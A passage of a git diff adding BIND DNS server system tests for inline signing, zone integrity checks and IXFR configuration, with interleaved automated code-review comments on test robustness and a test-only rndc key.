+echo_i "checking that backlogged changes to raw zone are applied after keys become available (secondary) ($n)"
+ret=0
+# Restore the signing keys for this zone.
+mv ns3/removedkeys/Kremovedkeys-secondary* ns3
+$RNDCCMD 10.53.0.3 loadkeys removedkeys-secondary > /dev/null 2>&1
+# Determine what a SOA record with a bumped serial number should look like.
+BUMPED_SOA=$(sed -n 's/.*\(add removedkeys-secondary.*IN.*SOA\)/\1/p;' ns2/named.run | tail -1 | awk '{$8 += 1; print $0}')
+# Ensure the wait_until_raw_zone_update_is_processed() call below will ignore
+# log messages generated before the raw zone is updated.
+nextpart ns3/named.run > /dev/null
+# Bump the SOA serial number of the raw zone on the primary.
+$NSUPDATE << EOF || ret=1
+zone removedkeys-secondary.
+server 10.53.0.2 ${PORT}
+update del removedkeys-secondary. SOA
+update ${BUMPED_SOA}
+send
+EOF
+wait_until_raw_zone_update_is_processed "removedkeys-secondary"
+# Query for bar.removedkeys-secondary/A again and ensure the signer now returns
+# a positive, signed response.
+$DIG $DIGOPTS @10.53.0.3 bar.removedkeys-secondary. A > dig.out.ns3.test$n 2>&1
+grep "status: NOERROR" dig.out.ns3.test$n > /dev/null || ret=1
+grep "RRSIG" dig.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+# Check that the file $2 for zone $1 does not contain RRSIG records
+# while the journal file for that zone does contain them.
+ensure_sigs_only_in_journal() {
+ origin="$1"
+ masterfile="$2"
+ $CHECKZONE -i none -f raw -D -o - "$origin" "$masterfile" 2>&1 | grep -w RRSIG > /dev/null && ret=1
+ $CHECKZONE -j -i none -f raw -D -o - "$origin" "$masterfile" 2>&1 | grep -w RRSIG > /dev/null || ret=1
+}
+
+n=$((n + 1))
+echo_i "checking that records added from a journal are scheduled to be resigned ($n)"
+ret=0
+# Signing keys for the "delayedkeys" zone are not yet accessible. Thus, the
+# zone file for the signed version of the zone will contain no DNSSEC records.
+# Move keys into place now and load them, which will cause DNSSEC records to
+# only be present in the journal for the signed version of the zone.
+mv Kdelayedkeys* ns3/
+$RNDCCMD 10.53.0.3 loadkeys delayedkeys > rndc.out.ns3.pre.test$n 2>&1 || ret=1
+# Wait until the zone is signed.
+check_done_signing () (
+ $RNDCCMD 10.53.0.3 signing -list delayedkeys > signing.out.test$n 2>&1
+ num=$(grep "Done signing with" signing.out.test$n | wc -l)
+ [ $num -eq 2 ]
+)
+retry_quiet 10 check_done_signing || ret=1
+# Halt rather than stopping the server to prevent the file from being
+# flushed upon shutdown since we specifically want to avoid it.
+stop_server --use-rndc --halt --port ${CONTROLPORT} ns3
+ensure_sigs_only_in_journal delayedkeys ns3/delayedkeys.db.signed
+start_server --noclean --restart --port ${PORT} ns3
+# At this point, the raw zone journal will not have a source serial set. Upon
+# server startup, receive_secure_serial() will rectify that, update SOA, resign
+# it, and schedule its future resign. This will cause "rndc zonestatus" to
+# return delayedkeys/SOA as the next node to resign, so we restart the server
+# once again; with the raw zone journal now having a source serial set,
+# receive_secure_serial() should refrain from introducing any zone changes.
+stop_server --use-rndc --halt --port ${CONTROLPORT} ns3
+ensure_sigs_only_in_journal delayedkeys ns3/delayedkeys.db.signed
+nextpart ns3/named.run > /dev/null
+start_server --noclean --restart --port ${PORT} ns3
+# We can now test whether the secure zone journal was correctly processed:
+# unless the records contained in it were scheduled for resigning, no resigning
+# event will be scheduled at all since the secure zone file contains no
+# DNSSEC records.
+wait_for_log 20 "all zones loaded" ns3/named.run || ret=1
+$RNDCCMD 10.53.0.3 zonestatus delayedkeys > rndc.out.ns3.post.test$n 2>&1 || ret=1
+grep "next resign node:" rndc.out.ns3.post.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check that zonestatus reports 'type: primary' for an inline primary zone ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 zonestatus master > rndc.out.ns3.test$n
+grep "type: primary" rndc.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "check that zonestatus reports 'type: secondary' for an inline secondary zone ($n)"
+ret=0
+$RNDCCMD 10.53.0.3 zonestatus bits > rndc.out.ns3.test$n
+grep "type: secondary" rndc.out.ns3.test$n > /dev/null || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking reload of touched inline zones ($n)"
+ret=0
+echo_ic "pre-reload 'next key event'"
+nextpart ns8/named.run > nextpart.pre$n.out
+count=$(grep "zone example[0-9][0-9].com/IN (signed): next key event:" nextpart.pre$n.out | wc -l)
+echo_ic "found: $count/16"
+[ $count -eq 16 ] || ret=1
+echo_ic "touch and reload"
+touch ns8/example??.com.db
+$RNDCCMD 10.53.0.8 reload 2>&1 | sed 's/^/ns3 /' | cat_i
+sleep 5
+echo_ic "post-reload 'next key event'"
+nextpart ns8/named.run > nextpart.post$n.out
+count=$(grep "zone example[0-9][0-9].com/IN (signed): next key event:" nextpart.post$n.out | wc -l)
+echo_ic "found: $count/16"
+[ $count -eq 16 ] || ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n + 1))
+echo_i "checking second reload of touched inline zones ($n)"
+ret=0
+nextpart ns8/named.run > nextpart.pre$n.out
+$RNDCCMD 10.53.0.8 reload 2>&1 | sed 's/^/ns3 /' | cat_i
+sleep 5
+nextpart ns8/named.run > nextpart.post$n.out
+grep "ixfr-from-differences: unchanged" nextpart.post$n.out && ret=1
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+n=$((n+1))
+echo_i "Check that 'rndc reload' of just the serial updates the signed instance ($n)"
+ret=0
+dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa1 || ret=1
+cp ns8/example2.db.in ns8/example.db || ret=1
+nextpart ns8/named.run > /dev/null
+rndccmd 10.53.0.8 reload || ret=1
+wait_for_log 3 "all zones loaded" ns8/named.run
+sleep 1
+dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa2 || ret=1
+soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa1)
+soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa2)
+ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa1)
+ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa2)
+test ${soa1:-1000} -lt ${soa2:-0} || ret=1
+test ${ttl1:-0} -eq 300 || ret=1
+test ${ttl2:-0} -eq 300 || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+n=$((n+1))
+echo_i "Check that restart with zone changes and deleted journal works ($n)"
+TSIG=
+ret=0
+dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa1 || ret=1
+stop_server --use-rndc --port ${CONTROLPORT} ns8
+# TTL of all records change from 300 to 400
+cp ns8/example3.db.in ns8/example.db || ret=1
+rm ns8/example.db.jnl
+nextpart ns8/named.run > /dev/null
+start_server --noclean --restart --port ${PORT} ns8
+wait_for_log 3 "all zones loaded" ns8/named.run
+sleep 1
+dig_with_opts @10.53.0.8 example SOA > dig.out.ns8.test$n.soa2 || ret=1
+soa1=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa1)
+soa2=$(awk '$4 == "SOA" { print $7 }' dig.out.ns8.test$n.soa2)
+ttl1=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa1)
+ttl2=$(awk '$4 == "SOA" { print $2 }' dig.out.ns8.test$n.soa2)
+test ${soa1:-1000} -lt ${soa2:-0} || ret=1
+test ${ttl1:-0} -eq 300 || ret=1
+test ${ttl2:-0} -eq 400 || ret=1
+test "$ret" -eq 0 || echo_i "failed"
+status=$((status+ret))
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/inline/tests_signed_zone_files.py b/bin/tests/system/inline/tests_signed_zone_files.py
new file mode 100755
index 0000000..596b756
--- /dev/null
+++ b/bin/tests/system/inline/tests_signed_zone_files.py
@@ -0,0 +1,67 @@
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+import glob
+import struct
+
+
+class RawFormatHeader(dict):
+ """
+ A dictionary of raw-format header fields read from a zone file.
+ """
+
+ fields = [
+ "format",
+ "version",
+ "dumptime",
+ "flags",
+ "sourceserial",
+ "lastxfrin",
+ ]
+
+ def __init__(self, file_name):
+ header = struct.Struct(">IIIIII")
+ with open(file_name, "rb") as data:
+ header_data = data.read(header.size)
+ super().__init__(zip(self.fields, header.unpack_from(header_data)))
+
+
+def test_unsigned_serial_number():
+ """
+ Check whether all signed zone files in the "ns8" subdirectory contain the
+ serial number of the unsigned version of the zone in the raw-format header.
+ The test assumes that all "*.signed" files in the "ns8" subdirectory are in
+ raw format.
+
+ Notes:
+
+ - The actual zone signing and dumping happens while the tests.sh phase of
+ the "inline" system test is set up and run. This check only verifies
+ the outcome of those events; it does not initiate any signing or
+ dumping itself.
+
+ - example[0-9][0-9].com.db.signed files are initially signed by
+ dnssec-signzone while the others - by named.
+ """
+
+ zones_with_unsigned_serial_missing = []
+
+ for signed_zone in sorted(glob.glob("ns8/*.signed")):
+ raw_header = RawFormatHeader(signed_zone)
+ # Ensure the unsigned serial number is placed where it is expected.
+ assert raw_header["format"] == 2
+ assert raw_header["version"] == 1
+ # Check whether the header flags indicate that the unsigned serial
+ # number is set and that the latter is indeed set.
+ if raw_header["flags"] & 0x02 == 0 or raw_header["sourceserial"] == 0:
+ zones_with_unsigned_serial_missing.append(signed_zone)
+
+ assert not zones_with_unsigned_serial_missing
diff --git a/bin/tests/system/integrity/clean.sh b/bin/tests/system/integrity/clean.sh
new file mode 100644
index 0000000..941fccf
--- /dev/null
+++ b/bin/tests/system/integrity/clean.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.test*
+rm -f */named.memstats
+rm -f */named.conf
+rm -f */named.run
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/integrity/ns1/mx-cname.db b/bin/tests/system/integrity/ns1/mx-cname.db
new file mode 100644
index 0000000..a700269
--- /dev/null
+++ b/bin/tests/system/integrity/ns1/mx-cname.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns1 hostmaster 0 0 0 0 0
+@ NS ns1
+@ MX 0 cname
+ns1 A 10.53.0.1
+cname CNAME ns1
diff --git a/bin/tests/system/integrity/ns1/named.conf.in b/bin/tests/system/integrity/ns1/named.conf.in
new file mode 100644
index 0000000..4009c4f
--- /dev/null
+++ b/bin/tests/system/integrity/ns1/named.conf.in
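Review bot: In `test_unsigned_serial_number`, the closing `assert not zones_with_unsigned_serial_missing` also holds when `glob.glob("ns8/*.signed")` matches nothing, so the check passes vacuously if it runs from another directory or before any zone has been dumped. Collecting the list first and asserting it is non-empty closes that gap: `signed_zones = sorted(glob.glob("ns8/*.signed"))` followed by `assert signed_zones, "no ns8/*.signed files found"`. Separately, `RawFormatHeader.__init__` hands whatever `data.read(header.size)` returned straight to `unpack_from`, so a truncated file surfaces as a bare `struct.error` without the file name; a length check that names the file would make that failure readable. The `0x02` mask in the flags test would also be clearer as a named constant with a comment saying which header flag it is.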
@@ -0,0 +1,114 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "mx-cname-fail" { + type primary; + check-integrity yes; + check-mx-cname fail; + file "mx-cname.db"; +}; + +zone "mx-cname-warn" { + type primary; + check-integrity yes; + check-mx-cname warn; + file "mx-cname.db"; +}; + +zone "mx-cname-ignore" { + type primary; + check-integrity yes; + check-mx-cname ignore; + file "mx-cname.db"; +}; + +zone "no-mx-cname-fail" { + type primary; + check-integrity no; + check-mx-cname fail; + file "mx-cname.db"; +}; + +zone "no-mx-cname-warn" { + type primary; + check-integrity no; + check-mx-cname warn; + file "mx-cname.db"; +}; + +zone "no-mx-cname-ignore" { + type primary; + check-integrity no; + check-mx-cname ignore; + file "mx-cname.db"; +}; + +zone "srv-cname-fail" { + type primary; + check-integrity yes; + check-srv-cname fail; + file "srv-cname.db"; +}; + +zone "srv-cname-warn" { + type primary; + check-integrity yes; + check-srv-cname warn; + file "srv-cname.db"; +}; + +zone "srv-cname-ignore" { + type primary; + check-integrity yes; + check-srv-cname ignore; + file "srv-cname.db"; +}; +zone "no-srv-cname-fail" { + type primary; + check-integrity no; + check-srv-cname fail; + file "srv-cname.db"; +}; + +zone 
"no-srv-cname-warn" { + type primary; + check-integrity no; + check-srv-cname warn; + file "srv-cname.db"; +}; + +zone "no-srv-cname-ignore" { + type primary; + check-integrity no; + check-srv-cname ignore; + file "srv-cname.db"; +}; diff --git a/bin/tests/system/integrity/ns1/srv-cname.db b/bin/tests/system/integrity/ns1/srv-cname.db new file mode 100644 index 0000000..d6ae603 --- /dev/null +++ b/bin/tests/system/integrity/ns1/srv-cname.db @@ -0,0 +1,17 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 3600 +@ SOA ns1 hostmaster 0 0 0 0 0 +@ NS ns1 +@ SRV 0 0 0 cname +ns1 A 10.53.0.1 +cname CNAME ns1 diff --git a/bin/tests/system/integrity/setup.sh b/bin/tests/system/integrity/setup.sh new file mode 100644 index 0000000..e46affa --- /dev/null +++ b/bin/tests/system/integrity/setup.sh @@ -0,0 +1,17 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf diff --git a/bin/tests/system/integrity/tests.sh b/bin/tests/system/integrity/tests.sh new file mode 100644 index 0000000..b69c3b4 --- /dev/null +++ b/bin/tests/system/integrity/tests.sh 
@@ -0,0 +1,131 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" + +status=0 +n=1 + +echo_i "check that 'check-integrity yes; check-mx-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-fail > dig.out.test$n || ret=1 +grep "status: SERVFAIL," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-fail/IN: mx-cname-fail/MX 'cname.mx-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-mx-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-warn/IN: mx-cname-warn/MX 'cname.mx-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-mx-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx mx-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone mx-cname-ignore/IN: mx-cname-ignore/MX 'cname.mx-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-fail > dig.out.test$n || 
ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-fail/IN: no-mx-cname-fail/MX 'cname.no-mx-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-warn/IN: no-mx-cname-warn/MX 'cname.no-mx-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-mx-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 mx no-mx-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-mx-cname-ignore/IN: no-mx-cname-ignore/MX 'cname.no-mx-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-fail > dig.out.test$n || ret=1 +grep "status: SERVFAIL," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-fail/IN: srv-cname-fail/SRV 'cname.srv-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-warn/IN: srv-cname-warn/SRV 'cname.srv-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null || ret=1 +n=`expr $n + 1` +if [ 
$ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity yes; check-srv-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv srv-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone srv-cname-ignore/IN: srv-cname-ignore/SRV 'cname.srv-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname fail;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-fail > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-fail/IN: no-srv-cname-fail/SRV 'cname.no-srv-cname-fail' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname warn;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-warn > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-warn/IN: no-srv-cname-warn/SRV 'cname.no-srv-cname-warn' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "check that 'check-integrity no; check-srv-cname ignore;' works ($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.1 srv no-srv-cname-ignore > dig.out.test$n || ret=1 +grep "status: NOERROR," dig.out.test$n > /dev/null || ret=1 +grep "zone no-srv-cname-ignore/IN: no-srv-cname-ignore/SRV 'cname.no-srv-cname-ignore' is a CNAME (illegal)" ns1/named.run > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +test $status -eq 0 || exit 1 
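Review bot: Every check against ns1/named.run passes the expected log line to plain `grep`, so it is read as a basic regular expression and each `.` in names such as `cname.mx-cname-fail` matches any character. Using `grep -F` for these lines pins the literal message text; the ixfr tests.sh added in the same commit already uses `grep -q -F` for its log checks. The twelve stanzas differ only in record type, zone name, expected status and whether the log line must be present, so a small helper taking those four arguments would also remove the repetition.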
diff --git a/bin/tests/system/ixfr/ans2/startme b/bin/tests/system/ixfr/ans2/startme new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/ixfr/ans2/startme diff --git a/bin/tests/system/ixfr/clean.sh b/bin/tests/system/ixfr/clean.sh new file mode 100644 index 0000000..eb78363 --- /dev/null +++ b/bin/tests/system/ixfr/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f stats.* +rm -f ns1/*.db ns1/*.jnl +rm -f ns3/*.jnl ns3/mytest*.db ns3/subtest*.db +rm -f ns4/*.jnl ns4/*.db +rm -f ns5/*.jnl ns5/*.db +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run */named.run.prev +rm -f */ans.run +rm -f dig.out.test* dig.out1.test* dig.out2.test* dig.out3.test* +rm -f ns3/large.db +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys diff --git a/bin/tests/system/ixfr/ixfr-stats.good b/bin/tests/system/ixfr/ixfr-stats.good new file mode 100644 index 0000000..3d0d2dd --- /dev/null +++ b/bin/tests/system/ixfr/ixfr-stats.good @@ -0,0 +1,3 @@ +messages=1 +records=5 +bytes=204 diff --git a/bin/tests/system/ixfr/ns1/named.conf.in b/bin/tests/system/ixfr/ns1/named.conf.in new file mode 100644 index 0000000..497e255 --- /dev/null +++ b/bin/tests/system/ixfr/ns1/named.conf.in 
@@ -0,0 +1,33 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/ixfr/ns1/startme b/bin/tests/system/ixfr/ns1/startme new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/ixfr/ns1/startme diff --git a/bin/tests/system/ixfr/ns3/named.conf.in b/bin/tests/system/ixfr/ns3/named.conf.in new file mode 100644 index 0000000..3ff936e --- /dev/null +++ b/bin/tests/system/ixfr/ns3/named.conf.in 
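Review bot: The `controls` statement accepts rndc connections from `allow { any; }` and authenticates them with the literal secret `1234abcd8765`, and nothing in the file marks either as a test-only fixture. A comment above the `key` block would keep it from being copied into a real configuration, for example `/* Test-only rndc key for the 10.53.0.x system-test addresses; never reuse outside bin/tests/system. */`. The key presumably has to match the one in ../common/rndc.conf that tests.sh passes to rndc, which would be worth stating in the same comment once confirmed. The ns3, ns4 and ns5 named.conf.in hunks repeat the same key and `allow { any; }`, and ns3 additionally sets `allow-transfer { any; };`, so the same comment applies there.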
@@ -0,0 +1,52 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + allow-transfer { any; }; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type primary; + file "mytest.db"; + max-ixfr-ratio 75%; + }; + zone "sub.test" IN { + type primary; + file "subtest.db"; + }; + zone "large" IN { + type primary; + file "large.db"; + }; +}; diff --git a/bin/tests/system/ixfr/ns4/named.conf.in b/bin/tests/system/ixfr/ns4/named.conf.in new file mode 100644 index 0000000..934cbb6 --- /dev/null +++ b/bin/tests/system/ixfr/ns4/named.conf.in 
@@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view "primary" { + ixfr-from-differences yes; + request-ixfr yes; + zone "test" IN { + type secondary; + file "mytest.db"; + primaries { 10.53.0.3; }; + max-ixfr-ratio unlimited; + }; + zone "sub.test" IN { + type secondary; + file "subtest.db"; + request-ixfr no; + primaries { 10.53.0.3; }; + }; +}; diff --git a/bin/tests/system/ixfr/ns5/named.conf.in b/bin/tests/system/ixfr/ns5/named.conf.in new file mode 100644 index 0000000..b2bf6d5 --- /dev/null +++ b/bin/tests/system/ixfr/ns5/named.conf.in 
